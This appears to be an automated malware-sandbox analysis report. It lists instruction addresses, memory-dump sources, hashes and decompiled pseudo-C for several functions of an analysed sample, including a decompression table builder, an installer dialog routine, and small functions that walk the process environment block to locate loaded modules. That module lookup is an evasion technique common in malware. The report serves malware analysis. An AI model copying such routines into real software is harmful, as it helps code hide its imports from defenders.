0x0040710f
0x00407112
0x0040711b
0x0040711e
0x0040711e
0x00407114
0x00407114
0x00407117
0x00407117
0x00407112
0x00407109
0x00407120
0x00407122
0x00000000
0x00000000
0x00000000
0x00000000
0x00407122
0x004070a1
0x004070a1
0x004070a7
0x004070ad
0x004070af
0x00000000
0x00000000
0x004070b1
0x004070b1
0x004070b3
0x004070b5
0x004070bc
0x004070bc
0x004070be
0x004070b7
0x004070b7
0x004070b9
0x004070b9
0x004070c0
0x004070c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040713a
0x0040713a
0x0040713d
0x0040713f
0x00407142
0x00407145
0x00407145
0x00407145
0x00407145
0x00000000
0x00000000
0x00000000
0x004067f3
0x004067d7
0x00000000
0x004067dd
0x004067e0
0x004067ea
0x004067ed
0x004067f0
0x00000000
0x004067f0
0x004067d7
0x004067fb
0x004067fe
0x00406802
0x0040680c
0x00406816
0x00406819
0x0040681f
0x00406953
0x00406955
0x0040695b
0x0040695e
0x00406961
0x00000000
0x00406961
0x00406825
0x00406825
0x00406826
0x0040687e
0x0040687e
0x00406885
0x0040692b
0x0040692b
0x00406930
0x00406933
0x00406938
0x0040693b
0x00406940
0x00406943
0x00406948
0x0040694b
0x0040694b
0x00000000
0x0040688b
0x0040688b
0x0040688b
0x0040688b
0x0040688f
0x0040688f
0x004068b1
0x004068b4
0x004068b6
0x004068b9
0x004068be
0x00406894
0x00406894
0x00406899
0x0040689b
0x0040689d
0x004068a2
0x004068a8
0x004068ad
0x004068af
0x004068af
0x004068a4
0x004068a4
0x004068a4
0x004068a2
0x00000000
0x004068c0
0x004068ed
0x004068f2
0x004068f4
0x004068f5
0x004068f7
0x004068f8
0x004068f8
0x004068f8
0x00406920
0x00406925
0x00406925
0x00000000
0x00406925
0x004068be
0x00406885
0x00406828
0x00406828
0x00406829
0x00406873
0x00000000
0x00406873
0x0040682b
0x0040682c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406988
0x00406988
0x00406988
0x0040698b
0x00000000
0x00000000
0x00406968
0x00406968
0x0040696c
0x00000000
0x00000000
0x00406972
0x00406972
0x00406975
0x00406978
0x0040697d
0x0040697f
0x00406982
0x00406985
0x00406985
0x00406985
0x0040698d
0x0040698d
0x00406990
0x00406992
0x00406997
0x0040699a
0x0040699c
0x0040699f
0x00000000
0x00000000
0x004069a5
0x004069a5
0x004069a7
0x00000000
0x00000000
0x004069ad
0x004069ad
0x004069b1
0x00000000
0x00000000
0x004069b7
0x004069b7
0x004069ba
0x004069bc
0x00406a5a
0x00406a5a
0x00406a5d
0x00406a5f
0x00406a5f
0x00406a62
0x00406a65
0x00406a67
0x00406a69
0x00406a6b
0x00406a6b
0x00406a74
0x00406a79
0x00406a7c
0x00406a7f
0x00406a82
0x00406a85
0x00406a85
0x00406a85
0x00406a88
0x00406a8e
0x00406a8e
0x00406a94
0x00406a94
0x00406a94
0x00000000
0x00406a88
0x004069c2
0x004069c2
0x004069c8
0x004069cb
0x004069cd
0x004069f8
0x004069fb
0x00406a01
0x00406a06
0x00406a0c
0x00406a12
0x00406a14
0x00406a17
0x00406a20
0x00406a26
0x00406a26
0x00406a19
0x00406a1b
0x00406a1d
0x00406a1d
0x00406a28
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a3b
0x00406a3d
0x00406a3f
0x00406a42
0x00406a4b
0x00406a4b
0x00406a4d
0x00406a44
0x00406a44
0x00406a47
0x00406a47
0x00406a4f
0x00406a4f
0x00406a3d
0x00406a52
0x00406a54
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a54
0x004069cf
0x004069cf
0x004069d5
0x004069db
0x004069dd
0x00000000
0x00000000
0x004069df
0x004069df
0x004069e1
0x004069e3
0x004069e6
0x004069ed
0x004069ed
0x004069ef
0x004069e8
0x004069e8
0x004069ea
0x004069ea
0x004069f1
0x004069f3
0x004069f6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406afa
0x00406afd
0x00406b00
0x00406b06
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cdd
0x00406cdd
0x00406cdd
0x00406ce0
0x00406ce3
0x00406ce5
0x00406ce8
0x00406cee
0x00406cf5
0x00406cf7
0x00000000
0x00000000
0x00406bcb
0x00406bcb
0x00406bf3
0x00406bf3
0x00406bf3
0x00406bf5
0x00000000
0x00000000
0x00406bd3
0x00406bd3
0x00406bd7
0x00000000
0x00000000
0x00406bdd
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be8
0x00406bea
0x00406bed
0x00406bf0
0x00406bf0
0x00406bf0
0x00406bf7
0x00406bf7
0x00406bff
0x00406c02
0x00406c08
0x00406c0b
0x00406c0f
0x00406c13
0x00406c16
0x00406c19
0x00406c31
0x00406c31
0x00406c34
0x00406c42
0x00406c45
0x00406c36
0x00406c36
0x00406c38
0x00406c3f
0x00406c3f
0x00406c6e
0x00406c6e
0x00406c6e
0x00406c71
0x00406c73
0x00000000
0x00000000
0x00406c4e
0x00406c4e
0x00406c52
0x00000000
0x00000000
0x00406c58
0x00406c58
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c65
0x00406c68
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c75
0x00406c75
0x00406c77
0x00406c79
0x00406c84
0x00406c87
0x00406c8a
0x00406c8c
0x00406c8e
0x00406c90
0x00406c93
0x00406c96
0x00406c9b
0x00406c9e
0x00406ca1
0x00406ca4
0x00406cab
0x00406cae
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb6
0x00406cba
0x00406ccb
0x00406ccb
0x00406ccb
0x00406ccd
0x00406ccd
0x00406cd1
0x00406cd1
0x00406cd1
0x00406cd3
0x00406cd4
0x00406cd7
0x00406cd7
0x00406cd7
0x00406cda
0x00000000
0x00406cda
0x00406cbc
0x00406cbc
0x00406cbf
0x00000000
0x00000000
0x00406cc5
0x00406cc5
0x00000000
0x00406cc5
0x00406c1b
0x00406c1b
0x00406c1d
0x00406c1f
0x00406c22
0x00406c25
0x00406c29
0x00406c29
0x00406cfd
0x00406cfd
0x00406d00
0x00406d07
0x00406d0b
0x00406d0d
0x00406d10
0x00406d13
0x00406d18
0x00406d1b
0x00406d1d
0x00406d1e
0x00406d21
0x00406d2c
0x00406d2f
0x00406d46
0x00406d4b
0x00406d52
0x00406d57
0x00406d5b
0x00406d5d
0x00406d5d
0x00406d5d
0x00406d60
0x00406d62
0x00000000
0x00406d68
0x00406d68
0x00406d6c
0x00406d77
0x00406d8a
0x00406d8f
0x00406d94
0x00406d96
0x00000000
0x00000000
0x00406d9c
0x00406d9c
0x00406d9f
0x00406da1
0x00406daf
0x00406daf
0x00406db2
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dc1
0x00406dc4
0x00000000
0x00406dc4
0x00406da3
0x00406da3
0x00406da9
0x00000000
0x00000000
0x00000000
0x00406da9
0x00000000
0x00000000
0x00000000
0x00407148
0x00407148
0x0040714e
0x00407154
0x00407159
0x0040715f
0x00407165
0x00407167
0x0040716a
0x00407173
0x00407179
0x00407179
0x0040716c
0x0040716e
0x00407170
0x00407170
0x0040717b
0x0040717d
0x00407180
0x004071bb
0x004071bb
0x00000000
0x00407182
0x00407182
0x00407182
0x00407188
0x0040718b
0x0040718d
0x004071c2
0x004071c4
0x00000000
0x004071c4
0x00000000
0x0040718d
0x00000000
0x004067cc
0x0040719a
0x00000000
0x0040719a
0x00406bae
0x00406bb0
0x00000000
0x00000000
0x00406bb2
0x00406bb2
0x00406bb5
0x00000000
0x00406bb5
0x00406afa
0x00406abb
0x0040719f
0x004071a2
0x004071a4
0x004071ad
0x004071b3
0x00000000

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00407272, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6d0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6d0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x0040727d
0x00407285
0x00407289
0x0040728b
0x0040728e
0x00407290
0x00407290
0x00407292
0x00407299
0x0040729b
0x0040729b
0x004072a1
0x004072b6
0x004072be
0x004072c0
0x004072c2
0x004072c5
0x004072c6
0x004072c6
0x004072cc
0x00000000
0x00000000
0x004072ce
0x004072d1
0x00000000
0x00000000
0x00000000
0x004072d1
0x004072d5
0x004072d8
0x004072da
0x004072da
0x004072dd
0x004072e3
0x004072e4
0x00000000
0x00000000
0x00000000
0x004072e4
0x004072e9
0x004072ec
0x004072ee
0x004072ee
0x004072f4
0x004072f6
0x00407307
0x004072fa
0x004072fe
0x004075a3
0x00000000
0x004075a3
0x00407304
0x00407305
0x00407305
0x0040730d
0x00407310
0x00407314
0x00407316
0x00407318
0x0040731b
0x00000000
0x00000000
0x00407323
0x00407329
0x0040732b
0x0040732d
0x0040732e
0x00407343
0x00407343
0x00407346
0x00407348
0x00407348
0x0040734a
0x0040734f
0x00407351
0x00407358
0x0040735a
0x00407362
0x00407362
0x00407364
0x00407365
0x00407374
0x00407378
0x0040737c
0x0040737f
0x00407382
0x00407387
0x0040738a
0x00407390
0x00407397
0x0040739d
0x00407596
0x00407596
0x0040759b
0x004075aa
0x00000000
0x00000000
0x00000000
0x0040759b
0x004073aa
0x004073ad
0x004073b0
0x004073b3
0x004073b7
0x00000000
0x00000000
0x004073c2
0x004073c5
0x004073c6
0x004073c8
0x004073ce
0x004073d1
0x00000000
0x00000000
0x004073d7
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e7
0x004073e9
0x004073e9
0x004073f1
0x004073f5
0x004073fa
0x0040741f
0x00407425
0x00407427
0x00407429
0x0040742c
0x00407435
0x00000000
0x00000000
0x004073fc
0x004073fc
0x00407405
0x00407409
0x00000000
0x00000000
0x0040741a
0x0040741a
0x0040741d
0x00000000
0x00000000
0x0040740d
0x00407410
0x00407412
0x00407416
0x00000000
0x00000000
0x00407418
0x00407418
0x00000000
0x0040741a
0x0040743e
0x00407444
0x0040744e
0x00407450
0x00407455
0x00407457
0x0040748d
0x00407459
0x00407459
0x0040745c
0x0040745f
0x00407469
0x0040746c
0x00407473
0x0040747e
0x00407485
0x00407485
0x0040748f
0x00407492
0x00407494
0x0040749a
0x0040749a
0x004074a3
0x004074a6
0x004074ab
0x004074ba
0x004074c2
0x004074c7
0x004074eb
0x004074f3
0x004074f7
0x004074fd
0x004074c9
0x004074d7
0x004074da
0x004074e0
0x004074e0
0x00407501
0x004074bc
0x004074bc
0x004074bc
0x00407512
0x00407516
0x00407522
0x0040751d
0x00407520
0x00407520
0x0040752a
0x0040752f
0x00407537
0x00407533
0x00407535
0x00407535
0x0040753d
0x0040753f
0x00407546
0x00407550
0x0040755a
0x00407576
0x0040757a
0x004073bf
0x004073c5
0x004073c6
0x004073c8
0x004073ce
0x004073d1
0x00000000
0x00000000
0x00000000
0x004073d1
0x00000000
0x00000000
0x00000000
0x00000000
0x0040755c
0x0040755c
0x0040755c
0x00407561
0x0040756a
0x00407573
0x00000000
0x00407573
0x00407580
0x00407580
0x00407583
0x0040758a
0x0040758d
0x00000000
0x004073b0
0x00407330
0x00407332
0x00407332
0x00407336
0x00407339
0x0040733a
0x0040733a
0x00000000
0x00407332
0x004072a6
0x004072ac
0x00000000

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000775D, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000775D(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E100076A1(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}

0x10007769
0x10007772
0x1000777b
0x10007784
0x10007787
0x100077a6
0x100077af
0x00000000
0x00000000
0x00000000
0x100077b1
0x00000000

Memory Dump Source

Source File: 00000000.00000002.667292789.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.667275361.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667281974.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.667287022.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667308042.0000000010008000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
Instruction ID: 4e4b3f7a043e4a7796d4424f38f913c79aa4d5b2001c2db15d0f2c14f405b8cb
Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
Instruction Fuzzy Hash: 43014D78E14208EFDB80DF98C58099DBBF5FB082A0F5184A5EC08E7311D334AE509F41

Uniqueness

Uniqueness Score: -1.00%

Function 100074AD, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100074AD() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x100074c4

Memory Dump Source

Source File: 00000000.00000002.667292789.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.667275361.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667281974.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.667287022.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667308042.0000000010008000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x4bcdc2
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
